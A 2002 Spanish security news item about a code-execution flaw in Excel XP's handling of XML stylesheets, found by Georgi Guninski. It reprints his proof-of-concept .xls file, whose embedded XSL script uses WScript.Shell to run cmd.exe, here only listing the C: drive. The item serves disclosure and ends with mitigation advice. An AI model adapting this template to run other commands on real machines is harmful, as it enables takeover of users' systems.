sábado, 25 de mayo de 2002

Problema de seguridad en Excel XP

El ya conocido Georgi Guninski, habitual de nuestras noticias, ha descubierto una nueva vulnerabilidad acerca de un problema de seguridad que afecta a Excel XP.

Según Guninski, la hoja de cálculo de Microsoft para XP, se ve afectada por un problema debido a la incorporación de nuevas tecnologías como XML y XSLT. Desafortunadamente Excel ofrece un comportamiento incorrecto y se llegará a ejecutar código arbitrario si el usuario abre un archivo .xls y elige visualizarlo con la hoja de estilo xml.

Excel no da ningún aviso al usuario, tan solo pregunta cuando se desea emplear la hoja de estilo xml o no. De esta forma un archivo xls maliciosamente preparado podrá llegar a tomar el control del sistema.

Guninski ofrece la siguiente demostración del problema:

------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
----------------------

Se recomienda no emplear la hoja de estilo xml en caso de que Excel pregunte por dicha acción.


Antonio Ropero
antonior@hispasec.com


Más información:

Georgi Guninski security advisory #55, 2002:
Excel XP xml stylesheet problems:
http://www.guninski.com/ex$el2.html